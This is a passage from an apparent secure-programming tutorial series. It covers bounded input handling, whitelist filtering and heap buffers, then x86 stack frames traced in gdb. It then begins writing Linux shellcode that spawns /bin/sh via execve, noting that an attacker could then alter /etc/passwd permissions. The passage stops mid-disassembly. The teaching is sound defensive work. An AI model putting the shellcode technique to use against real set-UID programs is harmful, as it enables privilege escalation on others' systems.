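/* Hypothetical helper: copy an address of `length` bytes from `src`
   into *address. Returns 0 on success, -1 if the length is refused. */
int copy_address(unsigned long *address, const void *src, int length)
{
  if (length <= 0 || (size_t)length > sizeof(*address))
    return -1;                 /* negative, empty or too long */

  *address = 0;                /* no stale bytes if length is short */
  memcpy(address, src, (size_t)length);
  return 0;
}
```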

In some circumstances it’s impossible to truncate that way (path, hostname, URL…) and things have to be done earlier in the program as soon as data is typed.

Validating the data in two steps

A program running with privileges other than those of its user implies that you protect all data and that you consider all incoming data suspicious.

First of all, this concerns string input routines. According to what we just said, we won’t dwell on the fact that you should never use gets(char *array), since the string length is not checked (authors’ note : this routine should be forbidden by the link editor for newly compiled programs). More insidious risks are hidden in scanf(). The line

scanf ("%s", string)

is as dangerous as gets(char *array), but it isn’t so obvious. But functions from the scanf() family offer a control mechanism on the data size :

  char buffer[256];
  scanf("%255s", buffer);

This formatting limits the number of characters copied into buffer to 255. On the other hand, scanf() puts the characters it doesn’t like back into the incoming stream so the risks of programming errors generating locks are rather high.

Using C++, the cin stream replaces the classical functions used in C (even if you can still use them). The following program fills a buffer :

  char buffer[500];
  cin >> buffer;

As you can see, it does no tests ! We are in a situation similar to gets(char *array) while using C : a door is wide open. The ios::width() member function lets you set the maximum number of characters to read.

The reading of data requires two steps. A first phase consists of getting the string with fgets(char *array, int size, FILE *stream), which limits the size of the memory area used. Next, the data read is formatted, through sscanf() for example. The first phase can do more, such as inserting fgets(char *array, int size, FILE *stream) into a loop that automatically allocates the required memory, without arbitrary limits. The GNU extension getline() can do that for you. It’s also possible to validate the typed characters using isalnum(), isprint(), etc. The strspn() function allows effective filtering. The program becomes a bit slower, but the sensitive parts of the code are protected from illegal data with a bulletproof jacket.
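The two phases can be sketched as follows, under the assumption that the expected input is a TCP port number on a line of its own. The names read_port(), parse_port() and LINE_SIZE are chosen for this illustration and do not come from the article's programs.

```c
#include <stdio.h>
#include <string.h>

#define LINE_SIZE 64   /* arbitrary bound chosen for this sketch */

/* Second phase: format the data. The width in "%5d" limits the number
   to five characters, so it cannot overflow a 32-bit int; the trailing
   " %c" matches only if something is left after the number. */
int parse_port(const char *line, int *port)
{
  int value;
  char extra;

  if (sscanf(line, "%5d %c", &value, &extra) != 1)
    return -1;                 /* not a number, or trailing junk */
  if (value < 1 || value > 65535)
    return -1;                 /* outside the accepted range */
  *port = value;
  return 0;
}

/* First phase: get the raw string, bounded by the buffer size. */
int read_port(FILE *in, int *port)
{
  char line[LINE_SIZE];

  if (fgets(line, sizeof(line), in) == NULL)
    return -1;                 /* end of file or read error */
  if (strchr(line, '\n') == NULL && !feof(in))
    return -1;                 /* line did not fit in the buffer */
  return parse_port(line, port);
}
```

A call such as read_port(stdin, &port) then either yields a validated value or fails, and the destination is left untouched on failure.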

Direct data typing is not the only attackable entry point. The software’s data files are vulnerable, but the code written to read them is usually stronger than the one for console input since programmers intuitively don’t trust file content provided by the user.

Buffer overflow attacks often lean on something else : environment strings. We must not forget that a programmer can fully configure a process environment before launching it. The convention saying an environment string must be of the “NAME=VALUE” type can be exploited by an ill-intentioned user. Using the getenv() routine requires some caution, especially regarding the length of the returned string (arbitrarily long) and its content (where you can find any character, `=' included). The string returned by getenv() must be treated like the one provided by fgets(char *array, int size, FILE *stream), taking care of its length and validating it one character after the other.

Using such filters is done like accessing a computer : default is to forbid everything ! Next, you can allow a few things :

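  #include <stdlib.h>
  #include <string.h>

  /* allowed characters; '_' is included because it is the
     replacement character used below */
  #define GOOD "abcdefghijklmnopqrstuvwxyz_"

  char *my_getenv(char *var) {
    char *data, *ptr;

    /* Getting the data */
    data = getenv(var);
    if (data == NULL)
      return NULL;

    /* Filtering
       Rem : obviously the replacement character must be
             in the list of the allowed ones !!! */
    for (ptr = data; *(ptr += strspn(ptr, GOOD));)
      *ptr = '_';

    return data;
  }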

The strspn() function makes it easy : it returns the length of the initial part of the string made only of characters from the “good” set, that is, the index (starting from 0) of the first character that is not part of it. You must never reverse the logic. Don’t validate against characters that you don’t want. Always check against the “good” characters.
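The same whitelist logic can also be used to reject a value instead of rewriting it. A minimal sketch, in which is_acceptable() and the GOOD_CHARS set are assumptions made for the example :

```c
#include <string.h>

#define GOOD_CHARS "abcdefghijklmnopqrstuvwxyz" \
                   "ABCDEFGHIJKLMNOPQRSTUVWXYZ" \
                   "0123456789_"

/* Returns 1 if value is non-NULL, no longer than max_len, and made
   only of characters from GOOD_CHARS; 0 otherwise. */
int is_acceptable(const char *value, size_t max_len)
{
  size_t len;

  if (value == NULL)
    return 0;
  len = strlen(value);
  if (len > max_len)
    return 0;
  return strspn(value, GOOD_CHARS) == len;   /* whole string is "good" */
}
```

Everything is forbidden by default : a character that nobody thought of, such as `=' or `/', is refused without having to be listed.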

Using dynamic buffers

Buffer overflow relies on overwriting a variable in the stack and changing the return address of a function. The attack involves automatic data, which is only allocated in the stack. A way to move the problem is to replace the character arrays allocated in the stack with dynamic variables found in the heap. To do this we replace the sequence

  #define LG_STRING    128
  int fonction (...)
  {
    char array [LG_STRING];
    ...
    return (result);
  }

with :

  #define LG_STRING    128
  int fonction (...)
  {
    char *string = NULL;
    if ((string = malloc (LG_STRING)) == NULL)
        return (-1);
    ...
    free (string);
    return (result);
  }

These lines bloat the code and risk memory leaks, but we must take advantage of these changes to modify the approach and avoid imposing arbitrary length limits. Note that you can’t expect the same result using alloca(). The code looks similar, but alloca() allocates the data in the process stack and that leads to the same problem as automatic variables. Initializing memory to zero using memset() avoids a few problems with uninitialized variables. Again, this doesn’t correct the problem, the exploit just becomes less trivial. Those wanting to carry on with the subject can read the article about Heap overflows from w00w00.
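Avoiding an arbitrary length limit means sizing the heap buffer from the data itself. A minimal sketch, in which join_path() is a hypothetical helper that builds a path from two strings of any length :

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical helper: build "dir/file" in a heap buffer sized from
   the inputs instead of a fixed-size array in the stack. Returns NULL
   if memory runs out; the caller must free() the result. */
char *join_path(const char *dir, const char *file)
{
  size_t size = strlen(dir) + 1 + strlen(file) + 1;  /* '/' and '\0' */
  char *path = malloc(size);

  if (path == NULL)
    return NULL;
  snprintf(path, size, "%s/%s", dir, file);
  return path;
}
```

The price is the one mentioned above : every successful call must be matched by a free(), otherwise the memory leaks.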

Last, let’s say it’s possible under some circumstances to quickly get rid of security holes by adding the static keyword before the buffer declaration. The compiler allocates this variable in the data segment far from the process stack. It becomes impossible to get a shell, but doesn’t solve the problem of a DoS (Denial of Service) attack. Of course, this doesn’t work if the routine is called recursively. This “medicine” has to be considered as a palliative, only used for eliminating a security hole in an emergency without changing much of the code.


We hope this overview of buffer overflows helps you to program more securely. Even if the exploit technique requires a good understanding of the mechanism, the general principle is rather accessible. On the other hand, the implementation of precautions is not that difficult. Don’t forget it’s faster to make a program secure at design time than to fix the faults later on. We’ll confirm this principle in our next article about format bugs.


Avoiding security holes when developing an application – Part 2: memory, stack and functions, shellcode


This series of articles tries to put the emphasis on the main security holes that can appear within applications. It shows ways to avoid those holes by changing development habits a little.

This article focuses on memory organization and layout and explains the relationship between a function and memory. The last section shows how to build shellcode.


In our previous article we analyzed the simplest security holes, the ones based on external command execution. This article and the next one show a widespread type of attack, the buffer overflow. First we will study the memory structure of a running application, and then we’ll write a minimal piece of code that starts a shell (shellcode).

Memory layout

What is a program?

Let’s assume a program is an instruction set, expressed in machine code (regardless of the language used to write it) that we commonly call a binary. When first compiled to get the binary file, the program source held variables, constants and instructions. This section presents the memory layout of the different parts of the binary.

The different areas

To understand what goes on while executing a binary, let’s have a look at the memory organization. It relies on different areas :

[Figure: memory layout]

This is generally not all, but we just focus on the parts that are most important for this article.

The command size -A file --radix 16 gives the size of each area reserved when compiling. From that you get their memory addresses (you can also use the command objdump to get this information). Here is the output of size for a binary called “fct”:

>>size -A fct --radix 16
fct  :
section            size        addr
.interp            0x13   0x80480f4
.note.ABI-tag      0x20   0x8048108
.hash              0x30   0x8048128
.dynsym            0x70   0x8048158
.dynstr            0x7a   0x80481c8
.gnu.version        0xe   0x8048242
.gnu.version_r     0x20   0x8048250
                    0x8   0x8048270
.rel.plt           0x20   0x8048278
.init              0x2f   0x8048298
.plt               0x50   0x80482c8
.text             0x12c   0x8048320
.fini              0x1a   0x804844c
.rodata            0x14   0x8048468
.data               0xc   0x804947c
.eh_frame           0x4   0x8049488
.ctors              0x8   0x804948c
.dtors              0x8   0x8049494
.got               0x20   0x804949c
.dynamic           0xa0   0x80494bc
.bss               0x18   0x804955c
.stab             0x978         0x0
.stabstr         0x13f6         0x0
.comment          0x16e         0x0
.note              0x78   0x8049574
Total            0x23c8

The text area holds the program instructions. This area is read-only. It’s shared between every process running the same binary. Attempting to write into this area causes a segmentation violation error.

Before explaining the other areas, let’s recall a few things about variables in C. The global variables are used in the whole program while the local variables are only used within the function where they are declared. The static variables have a known size depending on their type when they are declared. Types can be char, int, double, pointers, etc. On a PC type machine, a pointer represents a 32-bit integer address within memory. The size of the area pointed to is obviously unknown during compilation. A dynamic variable represents an explicitly allocated memory area – it is really a pointer pointing to that allocated address. Global/local and static/dynamic variables can be combined without problems.

Let’s go back to the memory organization for a given process. The data area stores the initialized global static data (the value is provided at compile time), while the bss segment holds the uninitialized global data. These areas are reserved at compile time since their size is defined according to the objects they hold.

What about local and dynamic variables? They are grouped in a memory area reserved for program execution (user stack frame). Since functions can be invoked recursively, the number of instances of a local variable is not known in advance. When creating them, they will be put in the stack. This stack is on top of the highest addresses within the user address space, and works according to a LIFO model (Last In, First Out). The bottom of the user frame area is used for dynamic variables allocation. This area is called heap : it contains the memory areas addressed by pointers and the dynamic variables. When declared, a pointer is a 32bit variable either in BSS or in the stack and does not point to any valid address. When a process allocates memory (i.e. using malloc) the address of the first byte of that memory (also 32bit number) is put into the pointer.

Detailed example

The following example illustrates the variable layout in memory :

/* mem.c */

  int    index = 1;   //in data
  char * str;         //in bss
  int    nothing;     //in bss

void f(char c)
{
  int i;              //in the stack
  /* Reserves 5 characters in the heap */
  str = (char*) malloc (5 * sizeof (char));
  strncpy(str, "abcde", 5);
}

int main (void)
{
  f(0);
}

The gdb debugger confirms all this.

>>gdb mem
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public
License, and you are welcome to change it and/or distribute
copies of it under certain conditions.  Type "show copying"
to see the conditions.  There is absolutely no warranty
for GDB.  Type "show warranty" for details.  This GDB was
configured as "i386-redhat-linux"...

Let’s put a breakpoint in the f() function and run the program until this point :

(gdb) list
7      void f(char c)
8      {
9         int i;
10        str = (char*) malloc (5 * sizeof (char));
11        strncpy (str, "abcde", 5);
12     }
14     int main (void)
(gdb) break 12
Breakpoint 1 at 0x804842a: file mem.c, line 12.
(gdb) run
Starting program: mem

Breakpoint 1, f (c=0 '\000') at mem.c:12
12      }

We now can see the place of the different variables.

1. (gdb) print &index
$1 = (int *) 0x80494a4
2. (gdb) info symbol 0x80494a4
index in section .data
3. (gdb)  print &nothing
$2 = (int *) 0x8049598
4. (gdb) info symbol 0x8049598
nothing in section .bss
5. (gdb) print str
$3 = 0x80495a8 "abcde"
6. (gdb) info symbol 0x80495a8
No symbol matches 0x80495a8.
7. (gdb) print &str
$4 = (char **) 0x804959c
8. (gdb) info symbol 0x804959c
str in section .bss
9. (gdb) x 0x804959c
0x804959c <str>:     0x080495a8
10. (gdb) x/2x 0x080495a8
0x80495a8: 0x64636261      0x00000065

The command in 1 (print &index) shows the memory address for the index global variable. The second instruction (info) gives the symbol associated to this address and the place in memory where it can be found : index, an initialized global static variable is stored in the data area.

Instructions 3 and 4 confirm that the uninitialized static variable nothing can be found in the BSS segment.

Line 5 displays str … in fact the str variable content, that is the address 0x80495a8. The instruction 6 shows that no variable has been defined at this address. Command 7 allows you to get the str variable address and command 8 indicates it can be found in the BSS segment.

At 9, the 4 bytes displayed correspond to the memory content at address 0x804959c : it’s a reserved address within the heap. The content at 10 shows our string “abcde” :

hexadecimal value : 0x64 63 62 61      0x00000065
character         :    d  c  b  a               e
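The byte order shown above can be reproduced by assembling the word by hand. This is a sketch for illustration; le_word() is a hypothetical helper that computes what a little endian CPU sees when it loads four consecutive bytes, whatever the machine running the code.

```c
#include <stdint.h>

/* Builds the 32-bit value a little endian CPU sees when it loads the
   four bytes starting at p: the first byte is the least significant. */
uint32_t le_word(const unsigned char *p)
{
  return (uint32_t)p[0]
       | ((uint32_t)p[1] << 8)
       | ((uint32_t)p[2] << 16)
       | ((uint32_t)p[3] << 24);
}
```

Applied to the bytes 'a', 'b', 'c', 'd' it gives 0x64636261, and applied to 'e' followed by three null bytes it gives 0x00000065, matching the two words displayed by gdb.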

The local variables c and i are put in the stack.

We notice that the size returned by the size command for the different areas does not match what we expected when looking at our program. The reason is that various other variables declared in libraries appear when running the program (type info variables under gdb to get them all).

The stack and the heap

Each time a function is called, a new environment must be created within memory for local variables and the function’s parameters (here environment means all elements appearing while executing a function : its arguments, its local variables, its return address in the execution stack… this is not the environment for shell variables we mentioned in the previous article). The %esp (extended stack pointer) register holds the address of the top of the stack and points to the last element added to it. In our representation this top is drawn at the bottom, but we’ll keep calling it the top to preserve the analogy with a stack of real objects. Depending on the architecture, this register may sometimes point to the first free space in the stack instead.

The address of a local variable within the stack could be expressed as an offset relative to %esp. However, items are constantly added to or removed from the stack, so the offset of each variable would need readjustment every time, which is very inefficient. The use of a second register improves that : %ebp (extended base pointer) holds the start address of the environment of the current function. Thus, it’s enough to express the offset relative to this register, which stays constant while the function is executed. Now it is easy to find the parameters or the local variables within a function.

The stack’s basic unit is the word : on i386 CPUs it’s 32bit, that is 4 bytes. This is different for other architectures. On Alpha CPUs a word is 64 bits. The stack only manages words, that means every allocated variable uses the same word size. We’ll see that with more details in the description of a function prolog. The display of the str variable content using gdb in the previous example illustrates it. The gdb x command displays a whole 32bit word (read it from left to right since it’s a little endian representation).

The stack is usually manipulated with just 2 cpu instructions :

  • push value : this instruction puts the value at the top of the stack. It reduces %esp by a word to get the address of the next word available in the stack, and stores the value given as an argument in that word;
  • pop dest : puts the item from the top of the stack into the ‘dest’. It puts the value held at the address pointed to by %esp in dest and increases the %esp register. To be precise nothing is removed from the stack. Just the pointer to the top of the stack changes.
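The two instructions above can be modelled with a small array. This is a toy model only, with hypothetical names (toy_stack, toy_push, toy_pop); the sp field plays the role of %esp, expressed as an index instead of an address.

```c
#include <stdint.h>

#define STACK_WORDS 16          /* arbitrary size for the model */

/* Toy model of a stack that grows toward lower addresses. */
struct toy_stack {
  uint32_t mem[STACK_WORDS];
  int sp;                       /* index of the last word pushed */
};

void toy_init(struct toy_stack *s)
{
  s->sp = STACK_WORDS;          /* empty: just past the highest word */
}

/* push: decrease sp by one word, then store the value there. */
int toy_push(struct toy_stack *s, uint32_t value)
{
  if (s->sp == 0)
    return -1;                  /* stack full */
  s->sp--;
  s->mem[s->sp] = value;
  return 0;
}

/* pop: read the word at sp, then increase sp. The old word stays in
   mem; only the pointer moves. */
int toy_pop(struct toy_stack *s, uint32_t *dest)
{
  if (s->sp == STACK_WORDS)
    return -1;                  /* stack empty */
  *dest = s->mem[s->sp];
  s->sp++;
  return 0;
}
```

Pushing 2 and then 1 and popping twice returns 1 first, then 2 (LIFO), and the value 2 is still present in mem after the second pop.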

The registers

What exactly are the registers? You can see them as drawers holding only one word, while memory is made of a series of words. Each time a new value is put in a register, the old value is lost. Registers allow direct communication between memory and CPU.

The first ‘e‘ appearing in the registers name means “extended” and indicates the evolution between old 16bit and present 32bit architectures.

The registers can be divided into 4 categories :

  1. general registers : %eax, %ebx, %ecx and %edx are used to manipulate data;
  2. segment registers : 16bit %cs, %ds, %es and %ss, hold the first part of a memory address;
  3. offset registers : they indicate an offset related to segment registers :
    • %eip (Extended Instruction Pointer) : indicates the address of the next instruction to be executed;
    • %ebp (Extended Base Pointer) : indicates the beginning of the local environment for a function;
    • %esi (Extended Source Index) : holds the data source offset in an operation using a memory block;
    • %edi (Extended Destination Index) : holds the destination data offset in an operation using a memory block;
    • %esp (Extended Stack Pointer) : the top of the stack;
  4. special registers : they are only used by the CPU.

Note: everything said here about registers is very x86 oriented but alpha, sparc, etc have registers with different names but similar functionality.

The functions


This section presents the behavior of a program from call to finish. Along this section we’ll use the following example :

/* fct.c */

void toto(int i, int j)
{
  char str[5] = "abcde";
  int k = 3;
  j = 0;
}

int main(int argc, char **argv)
{
  int i = 1;
  toto(1, 2);
  i = 0;
}

The purpose of this section is to explain the behavior of the above functions regarding the stack and the registers. Some attacks try to change the way a program runs. To understand them, it’s useful to know what normally happens.

Running a function is divided into three steps :

  1. the prolog : when entering a function, you already prepare the way out of it, saving the stack’s state before entering the function and reserving the needed memory to run it;
  2. the function call : when a function is called, its parameters are put into the stack and the instruction pointer (IP) is saved to allow the instruction execution to continue from the right place after the function;
  3. the function return : to put things back as they were before calling the function.

The prolog

A function always starts with the instructions :

push   %ebp
mov    %esp,%ebp
sub    $0xc,%esp       //$0xc depends on each program

These three instructions make up what is called the prolog. Diagram 1 details the way the toto() function prolog works, explaining the roles of the %ebp and %esp registers :

Diag. 1 : prolog of a function
[Figure: prolog] Initially, %ebp points in the memory to any X address. %esp is lower in the stack, at Y address and points to the last stack entry. When entering a function, you must save the beginning of the “current environment”, that is %ebp. Since %ebp is put into the stack, %esp decreases by a memory word.
[Figure: environment] This second instruction allows building a new “environment” for the function, putting %ebp on the top of the stack. %ebp and %esp then point to the same memory word, which holds the previous environment address.
[Figure: stack space for local variables] Now the stack space for local variables has to be reserved. The character array is defined with 5 items and needs 5 bytes (a char is one byte). However the stack only manages words, and can only reserve multiples of a word (1 word, 2 words, 3 words, …). To store 5 bytes in the case of a 4 bytes word, you must use 8 bytes (that is 2 words). The grayed part could be used, even if it is not really part of the string. The k integer uses 4 bytes. This space is reserved by decreasing the value of %esp by 0xc (12 written in hexadecimal). The local variables use 8+4=12 bytes (i.e. 3 words).
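The rounding to whole words described above is a one-line computation. A minimal sketch, where round_up_to_word() and WORD_SIZE are names chosen for the illustration :

```c
#include <stddef.h>

#define WORD_SIZE 4   /* bytes per stack word on i386 */

/* Rounds a size in bytes up to a whole number of stack words. */
size_t round_up_to_word(size_t bytes)
{
  return (bytes + WORD_SIZE - 1) / WORD_SIZE * WORD_SIZE;
}
```

For toto(), the 5-byte array rounds up to 8 bytes and the integer k to 4 bytes, which gives the 0xc subtracted from %esp in the prolog.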

Apart from the mechanism itself, the important thing to remember here is the position of the local variables : the local variables have a negative offset relative to %ebp. The i=0 instruction in the main() function illustrates this. The assembly code (cf. below) uses indirect addressing to access the i variable :

0x8048411 <main+25>:    movl   $0x0,0xfffffffc(%ebp)

The 0xfffffffc hexadecimal represents the -4 integer. The notation means put the value 0 into the variable found at “-4 bytes” relative to the %ebp register. i is the first and only local variable in the main() function, therefore its address is 4 bytes (i.e. integer size) “below” the %ebp register.
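Reading such a displacement as a signed number is a matter of two's complement arithmetic on 32 bits. A short sketch, with signed_offset() as a hypothetical helper :

```c
#include <stdint.h>

/* Interprets a 32-bit displacement, as printed by the disassembler,
   as a signed offset (two's complement). */
int64_t signed_offset(uint32_t raw)
{
  if (raw >= 0x80000000u)
    return (int64_t)raw - 4294967296LL;   /* subtract 2^32 */
  return (int64_t)raw;
}
```

With this reading, 0xfffffffc is -4, 0xfffffff8 is -8 and 0xfffffff4 is -12, while a small value such as 0xc stays +12.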

The call

Just like the prolog of a function prepares its environment, the function call allows this function to receive its arguments, and once terminated, to return to the calling function.

As an example, let’s take the toto(1, 2); call.

Diag. 2 : Function call
[Figure: arguments on the stack] Before calling a function, the arguments it needs are stored in the stack. In our example, the two constant integers 1 and 2 are first stacked, beginning with the last one. The %eip register holds the address of the next instruction to execute, in this case the function call.
[Figure: call] When executing the call instruction, %eip takes the address of the following instruction, found 5 bytes after (call is a 5 byte instruction – not every instruction uses the same space, and this depends on the CPU). The call then saves the address contained in %eip to be able to resume execution after running the function. This “backup” is done by an implicit instruction putting the register in the stack :

    push %eip

The value given as an argument to call corresponds to the address of the first prolog instruction from the toto() function. This address is then copied to %eip, thus it becomes the next instruction to execute.

Once we are in the function body, its arguments and the return address have a positive offset when related to %ebp, since the next instruction puts this register to the top of the stack. The j=0 instruction in the toto() function illustrates this. The Assembly code again uses indirect addressing to access the j :

0x80483ed <toto+29>:    movl   $0x0,0xc(%ebp)

The 0xc hexadecimal represents the +12 integer. The notation used means put the value 0 in the variable found at “+12 bytes” relative to the %ebp register. j is the function’s second argument and it’s found 12 bytes “above” the %ebp register (4 for the saved %ebp, 4 for the instruction pointer backup and 4 for the first argument – cf. the first diagram in the return section).

The return

Leaving a function is done in two steps. First, the environment created for the function must be cleaned up (i.e. putting %ebp and %eip back as they were before the call). Once this is done, we must clean the stack of the information related to the function we are just coming out of.

The first step is done within the function with the instructions :

leave
ret

The next one is done within the function where the call took place and consists of cleaning up the stack from the arguments of the called function.

We carry on with the previous example of the toto() function.

Diag. 3 : Function return
[Figure: initial situation] Here we describe the initial situation before the call and the prolog. Before the call, %ebp was at address X and %esp at address Y. From there we stacked the function arguments, saved %eip and %ebp and reserved some space for our local variables. The next executed instruction will be leave.
[Figure: leave] The instruction leave is equivalent to the sequence :

    mov %ebp,%esp
    pop %ebp

The first one takes %esp and %ebp back to the same place in the stack. The second one puts the top of the stack in the %ebp register. In only one instruction (leave), the stack is like it would have been without the prolog.

[Figure: restore] The ret instruction restores %eip in such a way that the calling function’s execution resumes where it should, that is after the function we are leaving. For this, it’s enough to unstack the top of the stack into %eip. We are not yet back to the initial situation since the function arguments are still stacked. Removing them will be the next instruction, represented with its Z+5 address in %eip (notice the instruction addressing is increasing as opposed to what’s happening on the stack).
[Figure: stacking of parameters] The stacking of parameters is done in the calling function, and so is the unstacking. This is illustrated in the opposite diagram with the separator between the instructions in the called function and the add 0x8, %esp in the calling function. This instruction moves %esp back toward the base of the stack by as many bytes as the toto() function parameters used. The %ebp and %esp registers are now in the situation they were in before the call. On the other hand, the %eip instruction register moved up.


gdb gives the Assembly code corresponding to the main() and toto() functions :

>>gcc -g -o fct fct.c
>>gdb fct
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.  GDB is free
software, covered by the GNU General Public License, and
you are welcome to change it and/or distribute copies of
it under certain conditions.  Type "show copying" to see
the conditions.  There is absolutely no warranty for GDB.
Type "show warranty" for details.  This GDB was configured
as "i386-redhat-linux"...
(gdb) disassemble main                    //main
Dump of assembler code for function main:

0x80483f8 <main>:    push   %ebp //prolog
0x80483f9 <main+1>:  mov    %esp,%ebp
0x80483fb <main+3>:  sub    $0x4,%esp

0x80483fe <main+6>:  movl   $0x1,0xfffffffc(%ebp)

0x8048405 <main+13>: push   $0x2 //call
0x8048407 <main+15>: push   $0x1
0x8048409 <main+17>: call   0x80483d0 <toto>

0x804840e <main+22>: add    $0x8,%esp //return from toto()

0x8048411 <main+25>: movl   $0x0,0xfffffffc(%ebp)
0x8048418 <main+32>: mov    0xfffffffc(%ebp),%eax

0x804841b <main+35>: push   %eax     //call
0x804841c <main+36>: push   $0x8048486
0x8048421 <main+41>: call   0x8048308 <printf>

0x8048426 <main+46>: add    $0x8,%esp //return from printf()
0x8048429 <main+49>: leave            //return from main()
0x804842a <main+50>: ret

End of assembler dump.
(gdb) disassemble toto                    //toto
Dump of assembler code for function toto:

0x80483d0 <toto>:     push   %ebp   //prolog
0x80483d1 <toto+1>:   mov    %esp,%ebp
0x80483d3 <toto+3>:   sub    $0xc,%esp

0x80483d6 <toto+6>:   mov    0x8048480,%eax
0x80483db <toto+11>:  mov    %eax,0xfffffff8(%ebp)
0x80483de <toto+14>:  mov    0x8048484,%al
0x80483e3 <toto+19>:  mov    %al,0xfffffffc(%ebp)
0x80483e6 <toto+22>:  movl   $0x3,0xfffffff4(%ebp)
0x80483ed <toto+29>:  movl   $0x0,0xc(%ebp)
0x80483f4 <toto+36>:  jmp    0x80483f6 <toto+38>

0x80483f6 <toto+38>:  leave         //return from toto()
0x80483f7 <toto+39>:  ret

End of assembler dump.

The instructions without color (in the listings above, the groups that carry no // annotation) correspond to our program instructions, such as assignments.

Creating a shellcode

In some cases, it’s possible to act on the process stack content by overwriting the return address of a function, making the application execute arbitrary code. This is especially interesting for a cracker if the application runs under an ID different from the user’s own (Set-UID program or daemon). This type of mistake is particularly dangerous if an application like a document reader is started by another user. A famous example is the Acrobat Reader bug, where a modified document was able to trigger a buffer overflow. It also works for network services (e.g. imap).

In future articles, we’ll talk about mechanisms used to execute instructions. Here we start studying the code itself, the one we want to be executed from the main application. The simplest solution is to have a piece of code that runs a shell. The reader can then perform other actions such as changing the /etc/passwd file permission. For reasons which will be obvious later, this program must be written in Assembly language. This type of small program which is used to run a shell is usually called shellcode.

The examples mentioned are inspired from Aleph One’s article “Smashing the Stack for Fun and Profit” from the Phrack magazine number 49.

With C language

The goal of a shellcode is to run a shell. The following C program does this :

/* shellcode1.c */

#include <stdio.h>
#include <unistd.h>

int main()
{
  char * name[] = {"/bin/sh", NULL};
  execve(name[0], name, NULL);
  return (0);
}

Among the set of functions able to call a shell, many reasons recommend the use of execve(). First, it’s a true system-call, unlike the other functions from the exec() family, which are in fact GlibC library functions built from execve(). A system-call is done from an interrupt. It suffices to define the registers and their content to get an effective and short Assembly code.

Moreover, if execve() succeeds, the calling program (here the main application) is replaced with the executable code of the new program, which then starts. When the execve() call fails, the program execution goes on. In our example, the code is inserted in the middle of the attacked application. Going on with execution would be meaningless and could even be disastrous. The execution then must end as quickly as possible. A return (0) exits a program only when this instruction is called from the main() function, which is unlikely here. We then must force termination through the exit() function.

/* shellcode2.c */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main()
{
  char * name [] = {"/bin/sh", NULL};
  execve (name [0], name, NULL);
  exit (0);
}

In fact, exit() is another library function that wraps the real system-call _exit(). A new change brings us closer to the system :

/* shellcode3.c */
#include <unistd.h>
#include <stdio.h>

int main()
{
  char * name [] = {"/bin/sh", NULL};
  execve (name [0], name, NULL);
  _exit (0);
}

Now, it’s time to compare our program to its Assembly equivalent.

Assembly calls

We’ll use gcc and gdb to get the Assembly instructions corresponding to our small program. Let’s compile shellcode3.c with the debugging option (-g) and, with the --static option, integrate into the program itself the functions normally found in shared libraries. Now, we have the needed information to understand the way the execve() and _exit() system-calls work.

$ gcc -o shellcode3 shellcode3.c -O2 -g --static

Next, with gdb, we look for the Assembly equivalent of our functions. This is for Linux on Intel platform (i386 and up).

$ gdb shellcode3
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public
License, and you are welcome to change it and/or distribute
copies of it under certain conditions.  Type "show copying"
to see the conditions.  There is absolutely no warranty
for GDB.  Type "show warranty" for details.  This GDB was
configured as "i386-redhat-linux"...

We ask gdb to list the Assembly code, more particularly its main() function.

(gdb) disassemble main
Dump of assembler code for function main:
0x8048168 <main>:       push   %ebp
0x8048169 <main+1>:     mov    %esp,%ebp
0x804816b <main+3>:     sub    $0x8,%esp
0x804816e <main+6>:     movl   $0x0,0xfffffff8(%ebp)
0x8048175 <main+13>:    movl   $0x0,0xfffffffc(%ebp)
0x804817c <main+20>:    mov    $0x8071ea8,%edx
0x8048181 <main+25>:    mov    %edx,0xfffffff8(%ebp)
0x8048184 <main+28>:    push   $0x0
0x8048186 <main+30>:    lea    0xfffffff8(%ebp),%eax
0x8048189 <main+33>:    push   %eax
0x804818a <main+34>:    push   %edx
0x804818b <main+35>:    call   0x804d9ac <__execve>
0x8048190 <main+40>:    push   $0x0
0x8048192 <main+42>:    call   0x804d990 <_exit>
0x8048197 <main+47>:    nop
End of assembler dump.

The calls to functions at addresses 0x804818b and 0x8048192 invoke the C library subroutines holding the real system-calls. Notice that the 0x804817c : mov $0x8071ea8,%edx instruction fills the %edx register with a value looking like an address. Let’s examine the memory content from this address, displaying it as a string :

(gdb) printf "%s\n", 0x8071ea8
/bin/sh

Now we know where the string is. Let’s have a look at the disassembly listings of the execve() and _exit() functions :

(gdb) disassemble __execve
Dump of assembler code for function __execve:
0x804d9ac <__execve>:    push   %ebp
0x804d9ad <__execve+1>:  mov    %esp,%ebp
0x804d9af <__execve+3>:  push   %edi
0x804d9b0 <__execve+4>:  push   %ebx
0x804d9b1 <__execve+5>:  mov    0x8(%ebp),%edi
0x804d9b4 <__execve+8>:  mov    $0x0,%eax
0x804d9b9 <__execve+13>: test   %eax,%eax
0x804d9bb <__execve+15>: je     0x804d9c2 <__execve+22>
0x804d9bd <__execve+17>: call   0x0
0x804d9c2 <__execve+22>: mov    0xc(%ebp),%ecx
0x804d9c5 <__execve+25>: mov    0x10(%ebp),%edx
0x804d9c8 <__execve+28>: push   %ebx
0x804d9c9 <__execve+29>: mov    %edi,%ebx
0x804d9cb <__execve+31>: mov    $0xb,%eax
0x804d9d0 <__execve+36>: int    $0x80
0x804d9d2 <__execve+38>: pop    %ebx
0x804d9d3 <__execve+39>: mov    %eax,%ebx
0x804d9d5 <__execve+41>: cmp    $0xfffff000,%ebx
0x804d9db <__execve+47>: jbe    0x804d9eb <__execve+63>
0x804d9dd <__execve+49>: call   0x8048c84 <__errno_location>
0x804d9e2 <__execve+54>: neg    %ebx
0x804d9e4 <__execve+56>: mov    %ebx,(%eax)
0x804d9e6 <__execve+58>: mov    $0xffffffff,%ebx
0x804d9eb <__execve+63>: mov    %ebx,%eax
0x804d9ed <__execve+65>: lea    0xfffffff8(%ebp),%esp
0x804d9f0 <__execve+68>: pop    %ebx
0x804d9f1 <__execve+69>: pop    %edi
0x804d9f2 <__execve+70>: leave
0x804d9f3 <__execve+71>: ret
End of assembler dump.
(gdb) disassemble _exit
Dump of assembler code for function _exit:
0x804d990 <_exit>:      mov    %ebx,%edx
0x804d992 <_exit+2>:    mov    0x4(%esp,1),%ebx
